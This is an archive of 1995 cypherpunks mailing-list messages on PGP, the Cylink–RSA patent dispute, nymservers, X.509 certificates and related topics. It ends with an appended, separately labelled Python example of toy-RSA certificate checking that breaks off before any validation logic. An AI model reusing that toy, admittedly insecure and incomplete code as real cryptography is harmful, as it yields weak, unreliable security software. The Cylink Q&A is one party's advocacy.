>this?  For example, can the server write to anything other than
>$HOME/.netscape-cookies?  If I write protect that file, but it's still
>owned by me, will Netscape still modify it?

The url for the spec is: http://home.netscape.com/newsref/std/cookie_spec.html.

The cookie overload probably only worked under 1.1 and before.  The spec
claims to have limits on the number of cookies you can have.  But between
this and the server API, I am sure that a hole or two has to exist.  This is
an area not explored by many.  (For good reason.  It is usually poorly
documented...)

OBParanoia:  Want something to really make you worried.  Imagine this for a
web page...  A local law enforcement agency decides that it wants to nab a
few of those "computer preverts".  They create a web site that has a cgi
script that looks for providers from a list.  It then has a link that shows
up only for people at one of those sites to "get hot porn pics".  They then
collect enough machine names and other info, then use the collected
information to obtain a warrant to seize the ISP's logs to match users with
machines. (Most browsers do not report e-mail address.) In the current
hysteria I do not see this scenario too far off.  Makes you wonder what
constitutes entrapment anymore?

|  Minister of Forced Caffinization in the DNRC   | alano@teleport.com   |
|"The moral PGP Diffie taught Zimmerman unites all| Disclaimer:          |
| mankind free in one-key-steganography-privacy!" | Ignore the man       |
|   -- PGP 2.6.2 key available on request --      |  behind the keyboard.|
|         http://www.teleport.com/~alano          |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Bryan <sbryan@maroon.tc.umn.edu> (Steve Bryan)
Date: Wed, 27 Sep 95 12:13:05 PDT
To: chen@intuit.com (Mark Chen)
Subject: Re: macworld crypto articles
Message-ID: <v02130502ac8f4f64de57@[204.221.10.130]>
MIME-Version: 1.0
Content-Type: text/plain


>> In article <4444rl$nrh@life.ai.mit.edu> Chen writes:
>> > It's truly a deplorable state of affairs.
>> 
>> For the next version, include PGP free with every version of Quicken,
>> and have Quicken just "call" PGP.
>> 
>> Of course, users can encrypt their files now with PGP.  Is there an
>> Intuit bboard where someone could post instructions?
>
>This is a good idea.  I'll bring it up with the appropriate people.
>
>Right now, we only have some cheesy forums going on Compuserve and
>Prodigy; however, keep your eyes peeled.  We have other stuff in the
>works.

PGP is probably too unwieldy for the non-hobbyist to comfortably use. I don't know if anyone else has suggested it but I'd strongly encourage Intuit to make CryptDisk for the Mac easily available. I use it to maintain an encrypted partition for my financial data and the user interface is quite simple. I believe the DOS equivalent is SecureDisk.

+----------------------------------------------------------------------
|Steve Bryan                Internet: sbryan@gofast.net
|Sexton Software          CompuServe: 76545,527
|Minneapolis, MN                 Fax: (612) 929-1799
|PGP key fingerprint: B4 C6 E2 A6 5F 87 57 7D  E1 8C A6 9B A9 BE 96 CB
+----------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Childers James <ic58@jove.acs.unt.edu>
Date: Wed, 27 Sep 95 12:13:07 PDT
To: cypherpunks@toad.com
Subject: (fwd) CYLINK Q&A on PKP Arbitration Decision
Message-ID: <199509271910.OAA23774@jove.acs.unt.edu>
MIME-Version: 1.0
Content-Type: text/plain


Newsgroups: sci.crypt,talk.politics.crypto,alt.security.pgp
Path: news.unt.edu!cs.utexas.edu!howland.reston.ans.net!ix.netcom.com!netcom.com!jkennedy
From: jkennedy@netcom.com (John Kennedy)
Subject: CYLINK Q&A on PKP Arbitration Decision
Message-ID: <jkennedyDFK1tA.57D@netcom.com>
Keywords: Cylink, PKP, RSA, Public Key
Organization: CYLINK
Date: Wed, 27 Sep 1995 08:19:58 GMT
Lines: 277
Sender: jkennedy@netcom23.netcom.com
Xref: news.unt.edu sci.crypt:39749 talk.politics.crypto:12787 alt.security.pgp:43387

-----------------------------------------------------------------
CYLINK Q&A on PKP ARBITRATION

The following statement from Cylink Corporation has been posted to
sci.crypt, talk.politics.crypto, and alt.security.pgp since we
believe it will be of interest to a large and diverse set of readers. 
Please choose the appropriate newsgroup(s) to direct any follow-
ups.

A copy of this statement is also being placed on Cylink web page
(http://www.cylink.com).  Additional related materials and updates 
will also appear there.

Feel free to distribute this statement to other appropriate
newsgroups, mailing lists, and individuals.

-John C. Kennedy, Cylink Corporation 
 {ph: 408.735.5885 , jkennedy@cylink.com}

---------------------- Cylink Corporation -------------------------

September 26, 1995

IMPACT OF CYLINK VS. RSA ARBITRATION AWARD
FREQUENTLY ASKED QUESTIONS
     
Q. Why is the recent arbitration award between Cylink and RSA Data
Security significant for RSA's licensees and vendors of public key
cryptography in general?
     
     A. The arbitration award is important to RSA's licensees for
     two reasons:
     
     First, the award makes it very clear that RSA does not have
     the right to authorize its customers to copy RSA's software;
     it doesn't matter whether the RSA customer is merely copying
     object code versions of RSA's products. The right to copy RSA
     software requires a patent license.
     
     Second, until now RSA has claimed itself to be the de facto
     standard in public key cryptography.  This claim was possible
     only so long as RSA could prevent its competitors from getting
     patent licenses from Public Key Partners.  Now that the
     arbitrators have dissolved PKP, Cylink can enable vendors to
     practice low cost public key technology without the use of
     RSA.  The market will finally enjoy vigorous competition based
     on technology and price.
     
Q. In a recent statement, RSA's president still makes the claim
that the use of RSA software does not require a separate patent
license.  Is that true?
     
     A. That statement is not true for any RSA licensee who needs
     the right to copy RSA software.  The heart of RSA's business
     is licensing so-called tool kits; the vendor takes one copy,
     incorporates it into the vendor's own product and then makes
     all of its own copies.  The only RSA customers who don't need
     a patent license are those who don't copy RSA software.
     
Q. That could be pretty serious for RSA and its customers.  Can you
back up this statement?
     
     A. Absolutely.  Read the arbitrators' award at p. 14.  If you
     haven't received a copy from RSA you can find it on Cylink's
     home page (http://www.cylink.com).  

     Don't take our word for it.  When RSA's own attorneys pleaded
     with the arbitrators to change their decision, they admitted
     that "... every single RSA licensee will now be required to
     obtain a Stanford Patent License from Cylink or run the risk
     of being sued" (ask RSA for a copy of its attorneys' letter dated
     September 7).  In a second decision dated September 12, the
     arbitrators flatly rejected RSA's pleas and confirmed their
     restrictions on the rights of RSA's customers. (a copy is also
     available from Cylink's home page).
     
Q. RSA's president promises to indemnify all of its customers.  Why
should they be concerned?
     
     A. If you compare RSA's size against the size and number of
     its customers copying RSA's software, one should ask whether
     RSA's pockets are deep enough to reimburse its customers for
     the damage RSA has caused.
     
Q. Did RSA know it did not have all of the rights it promised its
customers in RSA's software licenses?
     
     A. Shortly after RSA gave up its patent rights to PKP, Cylink
     began warning RSA that it did not have all of the rights it
     was promising some of its customers. Unfortunately, Cylink had
     to finally bring the arbitration to straighten this out. 
     
Q. Why do RSA's customers need a license to the Stanford patents
simply to copy RSA's software?
     
     A. Two reasons.  The Stanford Hellman-Merkle patent is the
     very first patent to describe Dr. Hellman's brilliant
     invention of public key cryptography.  All subsequent
     refinements on this pioneer patent which implement Dr.
     Hellman's concept, such as the RSA algorithm, require a
     license to Dr. Hellman's patent.  
    
     Secondly, the Diffie-Hellman key exchange technique is a
     standard feature in many of RSA's tool kits, which is also
     covered by Stanford's Diffie-Hellman patent.  Finally, if RSA
     were correct in its statements that you don't need a Stanford
     license to use RSA's software, why would they embark on yet
     another expensive lawsuit to attack the patents?
     
Q. Isn't the Hellman-Merkle patent limited to practicing something
called the knapsack?
     
     A. No.  As the pioneer patent in public key, the inventors
     were required to disclose only one implementation to support
     their ground breaking invention.  Even if no one is using the
     knapsack itself, this particular patent continues to cover all
     practice of public key.  Only improvements, such as the RSA
     algorithm described in MIT's patent, are limited to the
     specific enablement described in the patent.
     
     Again, don't just take our word for it.  RSA itself admits
     that RSA software is covered by these patents.  Just look at
     their license for RSAREF, Paragraph 6 (before they have time
     to change it).
     
Q. But RSA has now brought suit to invalidate the Stanford Patents. 
Doesn't this protect RSA's customers?
     
     A. RSA's attempt to invalidate the very patents it had been
     licensing as a partner in PKP does nothing for RSA's
     customers.  First of all, the fact that someone else is
     challenging the validity of a patent doesn't make an infringer
     immune from suit.  RSA's challenge to the Stanford patent
     would not prevent Cylink from suing and obtaining damages and
     an injunction against any infringer.  (Indemnity for damages,
     by the way, is cold comfort if an RSA customer is enjoined
     from selling any public key software.)
     
     Second, anyone who waits around for RSA's case to be resolved
     is taking a big gamble.  Patents are presumed valid and RSA
     will have to prove invalidity under the "clear and convincing"
     burden of proof (which is higher than the traditional
     "preponderance of the evidence" standard and just below the
     criminal "reasonable doubt" standard).  If RSA loses the
     suit, all of its customers will be left hanging.  An RSA
     indemnity won't be worth much if RSA goes into bankruptcy.
     
Q. RSA claims that Cylink "confirmed" to RSA licensees "in writing"
"that no separate patent licenses were necessary if they licensed
RSA software."  Is this true?
     
     A. No.  During the arbitration, however, one prospective RSA
     licensee approached Cylink and said that RSA kept assuring
     them that they didn't need a patent license to make their own
     copies of RSA public key software, but they had gotten
     suspicious when their own lawyers looked at the question
     closely.  Cylink told the prospect that a patent license was
     needed for some of their projects, but in this instance Cylink
     would not interfere with the pending RSA deal.  

     RSA customers who take the initiative and contact Cylink (as
     in this special case) can expect cooperation in resolving the
     patent problem.
     
Q. Why was PKP formed?
     
     A. Cylink formed PKP with RSA to pool both parties' rights to
     the Stanford and MIT patents, promote public key technology,
     and generate licensing revenue for the partners, the
     universities which owned the patents, and the inventors. 
      
Q. Why was PKP dissolved?
     
     A. Obviously great animosity has grown between the parties. 
     The main reason is that RSA frustrated Cylink's efforts to
     settle the U.S. Government's efforts to license the Digital
     Signature Standard. Now that Cylink has the Stanford patents
     back, the DSS as well as other public key techniques can begin
     competing with RSA in the market.  
     
Q. How will these public key implementations compete with RSA?
Isn't RSA a "de facto" standard?
     
     A. If anything, RSA software (which includes Stanford
     algorithms such as Diffie-Hellman) has been prevalent by
     "default" - not by choice.  Now the market will have a choice
     between multiple vendors competing on price as well as
     technical implementation.  Only after RSA's software faces the
     test of competition can it fairly claim to be a standard.
     
Q. In his recent statement, RSA's president makes numerous
accusations about Cylink's use of the RSA algorithm.  What are the
facts?
     
     A. The arbitrators' award is very clear that Cylink in fact has
     certain rights to license the MIT patent.  Specifically,
     Cylink has an option to license the MIT patent provided it
     uses some software provided by RSA.  This places Cylink in a
     better position than RSA's other customers who have no rights
     to the Stanford patents.  

     It is important to remember that Cylink built its business for
     the last ten years on the use of Stanford public key
     technology - which proves our point that you don't need RSA or
     its software to practice public key.
     
Q. Doesn't Cylink use the RSA algorithm in one of its products?
     
     A. Yes, and only one.  What RSA fails to mention is that
     Cylink's largest customer, SWIFT, already holds its own PKP
     license which the arbitrators forced RSA to grant.  This
     license allows Cylink to make the product for SWIFT.
     
Q. RSA claims that Cylink was offered a license to the RSA Patent,
and that Cylink turned it down.  Is that true?  
     
     A. Like a lot of what RSA says, it's a half-truth.  In June,
     1994, RSA did offer a patent license, and Cylink did turn it
     down.  Why?  Because a condition of the license was that
     Cylink release RSA for all liability for its licensing
     practices.  In other words, the price for the license was more
     than just the royalty.  Cylink was being asked to forgive RSA
     for the wrongs it committed over the years, and this Cylink
     would not do.
     
Q. Why did Cylink decide to use RSA in this one product?
     
     A. During PKP's existence, RSA frequently sought Cylink's
     support for its technology by asking Cylink to use RSA.  While
     RSA now tells a different story, RSA's own newsletter (see,
     for example RSA's "Ciphertext" Fall 1993 issue) and corporate
     profile frequently promoted Cylink's use of RSA long before
     the parties fell into their dispute over licensing DSS. 
     Having cooperated with RSA, and agreed to use their technology
     in one product, RSA tried to blackmail Cylink to stop PKP's
     settlement with the Government.
     
     In any event, the restrictions imposed by the arbitrators on
     RSA's licensing business are far more severe than the minor
     inconvenience Cylink may experience in retro-fitting its
     product with Stanford technology.
     
Q. What will Cylink do with the Stanford patents now?
     
     A. Before the arbitrators' decision many of RSA's customers
     had no reason to doubt RSA's word.  Those RSA customers who
     now come forward will be offered very favorable agreements.
     Cylink is more interested in establishing commercial
     relationships with RSA's licensees and promoting public key
     technology than in disrupting existing business.  
     
Q. Will Cylink attempt to stop the non-commercial use of public key
(such as in PGP)?
     
     A. No.  Although, technically, a Stanford patent license is
     needed for the public domain software such as PGP, Cylink
     intends to promote the use of public key on the Internet. 
     Cylink intends to announce a royalty-free license for personal
     use after meeting with a spokesperson for the PGP community. 
     Watch Cylink's home page for details. (http://www.cylink.com)
     
Q. What advice can you give?
     
     A. Get the facts first.  Read the arbitrators' decision,
     including their September 12 ruling which denied RSA's request
     for modification.  Then call us.  

     (Call Bob Fougner at 408-735-5893, fax 408-735-6642, e-mail:
     fougner@cylink.com).

---------------------- Cylink Corporation -------------------------

John Kennedy 
Cylink Corporation
408-735-5885
jkennedy@cylink.com


--
"Freedom is meaningless unless  | ic58@jove.acs.unt.edu - James Childers
 you can give to those with whom| No man's freedom is safe
 you disagree." - Jefferson     |    while Congress is in session
        EA 73 53 12 4E 08 27 6C   21 64 28 51 92 0E 7C F7




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Wed, 27 Sep 95 14:17:14 PDT
To: sameer <sameer@c2.org>
Subject: Re: JCrypt (was: getting netscape to support the remailers)
Message-ID: <v02120d08ac8f7bd3198e@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain


>        That was what I was thinking as well. I am confused by
>Netscape's java support though.. I haven't seen very many details. Is
>netscape going to only support applets or can you add stuff to the
>runtime as well? In order to use jcrypt one needs access to add stuff
>to the runtime I believe.

Currently jcrypt is implemented as a glue layer on top of RSAREF.
This means it has to be accessed through native methods. Also,
in general, one doesn't want to be downloading trusted security code
every time one uses it, even if it has strong authentication (and
this hasn't been built into Java yet.)

So there are two questions:

  o Will netscape allow local trusted Java code to be invoked
    by downloaded applets?
  o Will netscape support native methods in such code?

I would _greatly_ prefer to implement the jcrypt code in 100%
java, but there are legal barriers to doing this where RSA is
patented. JCrypt, however, is designed to allow the native
methods to be replaced with Java should someone desire to do
that.

Also, there are other architectural concerns involving the
direct or indirect invocation of local trusted encryption code
by untrusted, downloaded software, which will be addressed
somewhat in the next release of JCrypt.

>
>>
>> >     I started thinking about what it would take to get Netscape
>> >  to support sending mail through the remailers, after having
>> >  read the S/MIME specs which Netscape 2.0 is apparently going to
>> >  support. Perhaps with enough browbeating Netscape 3.0 will support
>> >  the remailers.
>>
>> Netscape doesn't need to support remailers explicitly since Netscape
>> will be supporting Java.  I think a remailer client is within Java's
>> capabilities...  Anyone disagree?
>>
>> andrew
>>
>
>
>--
>sameer                                          Voice:   510-601-9777
>Community ConneXion                             FAX:     510-601-9734
>An Internet Privacy Provider                    Dialin:  510-658-6376
>http://www.c2.org (or login as "guest")                 sameer@c2.org






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sherry Mayo <scmayo@rschp2.anu.edu.au>
Date: Tue, 26 Sep 95 21:23:28 PDT
To: cypherpunks@toad.com
Subject: chaos cryptography
Message-ID: <9509270423.AA03675@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Hi all - saw this in New Scientist and thought you might be interested
(I guess it's more steganography than cryptography):

==========
"Secret signals hidden in chaos

...John Hogan of the Engineering Mathematics department at Bristol
showed the BA how such unpredictable systems can be used to protect
sensitive information. His team mixed the information with chaotic
electrical signals, transmitted the result, and then extracted the
hidden message.

Hogan and his team modified simple electrical circuits to generate
unpredictable signals and hid within them a recording of "Land of 
Hope and Glory". When the two identical circuits are connected, said
Hogan, the outputs instantly synchronise so that anything added to 
the transmission stands out. "It's like magic." he said.

If anyone intercepted the signal and fed it through a loudspeaker
all they would hear is a loud hiss. This makes the system suitable for
hiding confidential information - once, that is, the system is perfected.
At present, a decoded message sounds like a scratchy 78 recording
although it is still recognisable, said Hogan.

So far the researchers have succeeded only when the two circuits are
connected by wire a few cm long. They are now trying to replicate
the results in circuits that are separated by long distances and
connected by a radio link. They also want to see if it can be modified
for use with digital equipment."
============

Sherry

ps I wonder how close to real noise the "hiss" is.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Travis Corcoran <tjic@OpenMarket.com>
Date: Wed, 27 Sep 95 11:33:47 PDT
To: tcmay@got.net
Subject: Re: Timothy C. May: Mini-mailbombs and Warning Letters
In-Reply-To: <ac8ed65501021004cc69@[205.199.118.202]>
Message-ID: <199509271833.OAA13270@cranmore.openmarket.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Message-Signature-Date: Wed Sep 27 14:33:28 1995

>  Date: Wed, 27 Sep 1995 10:39:21 -0700
>  From: tcmay@got.net (Timothy C. May)
>  
>  At 4:28 PM 9/27/95, Travis Corcoran wrote:
>  
>  >As the author of the package in question, I would like to point out:
>  >
>  >(1) the email msg Tim refers to (hereafter referred to by me as "query-mail")
>  >                was a request for information, not a warning
>  

>  I don't sign my messages, never have, so I see no way this "agent" Travis
>  ran could find such a signed message from me.

OK, then this sidetracks the discussion, as it seems we've got a bug
in either software behavior (despite a fair amount of testing) or user
behavior.

If it's the former, I apologize for any hassle my software caused.
I'll investigate this and issue a fix if it is a software problem.
However, I remind you that the query-mail said in it

- ------------------------------ snip! ------------------------------

	If there is a bug w this sftwr (for example, you never PGP sign your
	msgs, so this entire msg makes no sense) [ ... ] please mail the
	author of this package ( tjic@openmarket.com )

- ------------------------------ snip! ------------------------------

For future reference, if anyone finds a bug in any of my software
(free or otherwise), it is much more likely to get fixed by mailing me
directly than by posting a manifesto about the class of software as a
whole to a mailing list or newsgroup.

>  >A question: in a situation like this one, where an individual
>  >signed a message with a key then did not make a key with the
>  >return address of his message available [ ... ] what next step -if
>  >any- do people think is more appropriate than sending mail to the
>  >individual asking them for a copy of the key ?
>
>  Ignore it. Why hassle people who have no plan or finger
>  configurations?

Well, during the year or so I've been using my package I've tried to
verify thousands of posts.  In hundreds of these times, I've not had
the key on hand and had to use finger or the keyservers.  In dozens of
these times, finger and the keyserver failed, I sent mail to the
original poster, and got a response back along the lines of:

		"Unfortunately finger doesn't work at my site, but my key is on the
		keyserver...oh, wait...the address on the key is 6 months out of date!
		Sorry!  Just updated it.  { Try now. | My updated key is below }."  

Thus, history has shown that it is often quite valid to ask people for
their keys when all other avenues have been exhausted.

Further, I imagine that the vast majority of people who sign public
UseNet messages intend for their messages to be verifiable, and thus
find it reasonable to be asked for their keys if their keys are not
easily available.  If anyone thinks this is an incorrect assumption,
I'd like to hear their thinking.

>  Besides, people who really want to communicate with me with PGP
>  simply ask for it.

Uh...isn't that the purpose that the query mail ("Please mail me your
key.  Thank you.") was serving?

I'm not sure whether you're objecting to someone asking for your key,
or the fact that they did it through a semi-automated process.


I posted an idea for a scheme recently that would convey the datum "I
prefer PGP-encrypted mail" to intelligent cryptography-aware
news/mail-readers.  Perhaps the same scheme should be used to convey
the datum "I do feel the need for my PGP-signed messages to be
verified.  Please do not ask me for my key."  While it would be easy
enough to implement, I'm not sure how many people would choose to
encode this tag into their sig block or headers...


>  If you don't like this, fine. But don't robo-interrogate and send
>  robo-warnings.

I think the phrase "robo-interrogate" is pretty strong for sending a
piece of email that has as its central message 

		"Please mail me your key.  Thank you."

The phrase "robo-warnings" is even less appropriate and relevant.


For the record, the full text of the query mail (including all three
uses of the word "please", and all 0 references to "warnings",
"interrogations", and "truncheons" ) is:

- ------------------------------ snip! ------------------------------

	To: < mail-signer >
	Subject: please send me your PGP public key


	Hello.  While reading either email or UseNet I came across a PGP
	signed msg from you, but did not have your public key to verify it
	with.  My mail/newsreader fingered your account for your key and
	failed.  It then tried to get your key from the keyserver at

		< keyserver-address >

	but the key was not there.  Please mail me your key.  Thank you.

	 (If you think that the key should be there, be aware that my
	mailreader searched for the key by your email addr as seen by me - the
	same addr *this* piece of mail is being sent to.  If you registered a
	key with the server, that key may not have on it your addr as it is
	seen by the rest of the world.)

	P.S.  This mail was composed by my mailreading sftwr, which
	automatically scans incoming mail, looking for failed keyserver
	requests, and prompts me whether it should automatically send this msg
	on my behalf.  If there is a bug w this sftwr (for example, you never
	PGP sign your msgs, so this entire msg makes no sense), or if you're
	interested in the software itself (mail-secure.el: a package in lisp
	for emacs; this is just one of the many crypto/privacy related things
	it does) please mail the author of this package ( tjic@openmarket.com)
	for details.

- ------------------------------ snip! ------------------------------

If anyone has a constructive suggestion as to how this mail could be
changed to convey more information or to be less "threatening", please
mail me.

- -- 
TJIC (Travis J.I. Corcoran)       http://www.openmarket.com/personal/tjic/

                             Member EFF, GOAL, NRA.
                 opinions (TJIC) != opinions (employer (TJIC))
         "Buy a rifle, encrypt your data, and wait for the Revolution!"
	  PGP encrypted mail preferred.   Ask me about gnuslive.el for emacs.



-----BEGIN PGP SIGNATURE-----
Version: 2.6
Comment: auto-signed by mail-secure.el v 0.998 using mailcrypt.el
Comment: Processed by Mailcrypt 3.3, an Emacs/PGP interface

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 27 Sep 95 15:23:36 PDT
To: cypherpunks@toad.com
Subject: Re: alpha.c2.org nymserver
Message-ID: <199509272222.PAA13596@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>> Also, I am having a LOT of grief trying to get the alpha.c2.org  remailer to
>> work for me... (yes, I have the help files)
>> Could someone walk me through it? 
>
>You mean the nym server at alpha.c2.org? It seems to have about a 1 week
>delay on it...
> 
>Be sure the reply block that you give it is your own, and that you tell
>alpha which remailer the reply block goes to.

If you get a copy of the latest Private Idaho beta, it's got a convenient set
of user interfaces for using the nymservers, as well as for PGP, remailers, etc.
(Runs on Windows, so some of you may not find it all _that_ convenient :-)
PI works with either vanilla PGP or ViaCrypt.
The first step is to get the PGP key for alias@alpha.c2.org installed in your
key ring, and update PI's key tables (a menu item).  Then choose the
"Create a nym" menu item and follow all the dialog boxes.  I found it a
little confusing at first, since I didn't realize the nymserver just uses
secret-key encryption and not public-key, so you don't need to create a
public-key-pair to do it - the only PGP involved is encrypting the message
sent to the nymserver.

So you can now send mail to the _highly_ anonymous wcs@alpha.c2.org :-)
#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 27 Sep 95 15:24:06 PDT
To: jay.hyden@alpha.c2.org
Subject: Re: Time Keys, Some Secure Ideas (by Alias: Jay Hyden)
Message-ID: <199509272223.PAA13696@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Jay - you wrote:
>             >> Time Keys, Some Secure Ideas <<
> The weakest attack on a time key based system is to spoof the
>computer that keeps track of time into releasing encryption
>keys i.e. change the clock.

No, the weakest link is that you have to trust the person _running_
the time key system.  Spoofing the clock only matters to a system 
you trust.  Even a system running on a satellite isn't trustable
unless you're running it yourself; your good friend and business partner
who launched it may have put in a backdoor because the KGB threatened
to kill his grandmother if he didn't.
#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 27 Sep 95 15:24:29 PDT
To: Jon Lasser <jlasser@rwd.goucher.edu>
Subject: Re: "Notes" to be Eclipsed by "Netscape"
Message-ID: <199509272223.PAA13730@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>> I've never even _seen_ a copy of Notes running on any machine, nor do I
>> know directly of _any_ of my colleagues who has. (Not saying nobody has, of
>> course, just that I can't find anyone I know well who has.)

Notes was a PC network reimplementation of PLATO, the system that also inspired
notesfiles, a distant cousin of Netnews (though I'm not sure if netnews was
originally inspired by PLATO or not...)  Netnews assumes that articles are
going to propagate for a while and then be trashed; notesfiles assumes you're
building a knowledge base that sticks around.  (This transitoriness has allowed
netnews to scale to its current N*100MB/day of trash :-) 
 
Notes is oriented more toward business kinds of collaboration, though it would
work fine with university research projects.  It's got all the PCish things
you'd expect, with GUIs and menus and icons that let you include various sorts
of documents and pictures as well as text; it seemed to be done reasonably well,
and there's a growing market for Notes administrators.  One definition of
"business" is "customers who want this stuff enough that we can charge them
big bucks for the servers"; client software has come down in price due to
market resistance.

One difficulty with Notes is that the earlier versions liked to run on
Novell IPX instead of TCP/IP, so it didn't immediately jump onto companies'
internal IP nets, or onto the global net for those brave souls willing to
expose their business communications systems to the world.  I do know
companies who run multiple Notes systems so that Project X can communicate
with its teaming partners at Company Y; I don't know how much integration
they have with their internal Notes systems.

AT&T Network Notes is a joint AT&T/Lotus project that uses AT&T's public IPX
network to support Notes on; I think it's now rolled out and accepting
customers, but it was mostly in press-release stage while I was at AT&T.

Notes does have encryption, using RSA and I think RC4; I'm not sure if they
do the 40 bits exportable/ 128 domestic bit or just use 40 bits.  Don't know
about overflow kinds of bugs; the bugs I've heard about were more problems
integrating with Cc:Mail :-)
#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Wed, 27 Sep 95 15:23:59 PDT
To: cypherpunks@toad.com
Subject: X.509, S/MIME, and evolution of PGP
Message-ID: <199509272223.PAA13812@ix7.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I'd always heard X.509 public key certificates were a hierarchical, evil,
anti-WebOfTrust ISOism.  But Netscape is now doing them, and talking S/MIME,
so I sat down to read the specs, and they're really not all that bad.  
(Technically, I've only read PKCS#6 and RFC 1422, and not the real ISOisms...)
Yeah, they've got lots of clunky ASN.1 Ambiguous Encoding Rules and X.500 
Silly Name Format, but those can be lived with, and the X.500 may be possible
to simply ignore in most cases.  Steve Kent, author of RFC1422, envisions that
a hierarchical world with government certification authorities would be the
most convenient implementation, and with the X.500 directory service serving
certificates, but that's primarily editorial and not required by the technology.

Since a zillion and a half people are about to acquire Netscape 2.0,
which supports non-Verisign-signed X.509 certificates and DES, we can 
definitely extend the Web of Trust concept to that world; can we also 
extend secure user-to-user messaging?  It's time for PGP to mutate and
take over the world...

An X.509 certificate has the following components  
       1.  version

       2.  serial number

       3.  signature (algorithm ID and parameters)

       4.  issuer name

       5.  validity period

       6.  subject name

       7.  subject public key (and associated algorithm ID)
expressed as ASN.1 and signed with the issuer's public key.  The issuer and
subject names are expressed as X.500 addresses (big deal).  The CA's public key
is expected to be obtained out of band, or as a chain of signatures from
some other CA that you got a signature for out of band; there's no policy
implementation that says who can be one.  The primary requirements on CAs are
to never issue the same serial number twice, maintain uniqueness on 
signatures for subjects, and maintain a Certificate Revocation List which
is accessible somehow.  Unfortunately, the data format doesn't support
multiple signatures, but the documentation _does_ explicitly indicate that
you can _have_ multiple certifications; you just have to drag around
a bunch of separate certificates, leading to some obvious implementation
opportunities.  CRLs are less well-specified, though the PEM RFCs suggest
a PEM format; the main requirement is that they be keyed off the serial number,
which is why that has to be unique.

RFC 1422 proposes a rooted hierarchy of CAs - a root called the Internet Policy
Registration Authority, which would certify a bunch of Policy Certification
Authorities, which would each have different requirements on what their CAs
require from people who want to be certified, ranging from anonymous personas
to heavily identified Official People, and would do a certain amount of
coordination to preserve uniqueness.  Becoming a PCA would require paying
money to the IPRA.
However, there's no requirement that a _specific_ organization become the
_one_ _official_ IPRA; if somebody were to volunteer and announce themselves
as the IPRA, there's no particular conflict-resolution mechanism.
[ maybe it's time for a Cypherpunks Press Release?  No - I didn't say it.
Not me! ]

But rootedness only really matters to software that cares... and as long
as your software accommodates N levels of certification, you can
have a Web of Trust getting back to a key you signed yourself, and either
get an official persona certificate or plug your public key into your
software as the IPRA (and sign the real IPRA's certificate yourself :-)

Problems:
1) ITAR - shouldn't be a big deal, because all of this is building a
signature/authentication mechanism, it's not doing any encryption.
The encryption, if any, is a user agent issue, and that's Netscape's problem;
the Web of Trust tool is an add-on.

2) RSA patent - can this be built with RSAREF?  Or RSAREF with permission
for a couple extra activities?  Or built out of RIPEM or RIPEM-SIG?
The latter has the benefit of already being exportable.

3) Netscape compliance - the Netscape folks have been real friendly,
and I hope they'll leave their format for getting certificates open.

4) Other software and CA policy-makers - getting out first is worth something;
then you're the standard that they have to follow instead of the other way
around.  For some issues, like X.500 name vs. DNS name, there are probably
people in the IETF or community in general working on it, or alternatively
you can do an ugly hack abusing the organization and address fields.

5) S/MIME - real S/MIME compliance requires support for RC2 as well as
publicly available algorithms, though this is really just an X.509 handler.

6) It's a lot of work - well, yeah, it is.  And I'm lazy.  Is there enough
related code in SSLeay to steal to help implement it?




#---
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
# Phone +1-510-247-0664 Pager/Voicemail 1-408-787-1281
#---
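
[Added example, not part of the message above and not code from any X.509
implementation.  It models the certificate fields listed in the message and
validates a chain back to a locally installed key, with separate certificates
for one subject and a CRL keyed by issuer and serial number.  The toy
textbook-RSA keys, plain-string names, serials and dates are all constructed
assumptions.]

```python
# Added illustration: chain validation over the certificate fields listed in
# the message. Toy textbook RSA on small Mersenne primes stands in for real
# signatures (insecure by design); names, serials and dates are constructed.
import hashlib
from dataclasses import dataclass, replace
from datetime import date

def toy_keypair(a, b, e=65537):
    """Textbook RSA key from the Mersenne primes 2^a-1 and 2^b-1."""
    p, q = 2**a - 1, 2**b - 1
    n = p * q
    return (n, e), (n, pow(e, -1, (p - 1) * (q - 1)))   # (public, private)

def digest(data, n):
    return int.from_bytes(hashlib.sha256(data).digest(), "big") % n

@dataclass(frozen=True)
class Cert:
    version: int          # 1. version
    serial: int           # 2. serial number, unique per issuer
    sig_alg: str          # 3. signature algorithm ID
    issuer: str           # 4. issuer name (plain string here, not X.500)
    not_before: date      # 5. validity period
    not_after: date
    subject: str          # 6. subject name
    subject_key: tuple    # 7. subject public key (n, e)
    signature: int = 0    # issuer's signature over the fields above

    def tbs(self):
        """Bytes that get signed: every field except the signature itself."""
        return repr((self.version, self.serial, self.sig_alg, self.issuer,
                     self.not_before.isoformat(), self.not_after.isoformat(),
                     self.subject, self.subject_key)).encode()

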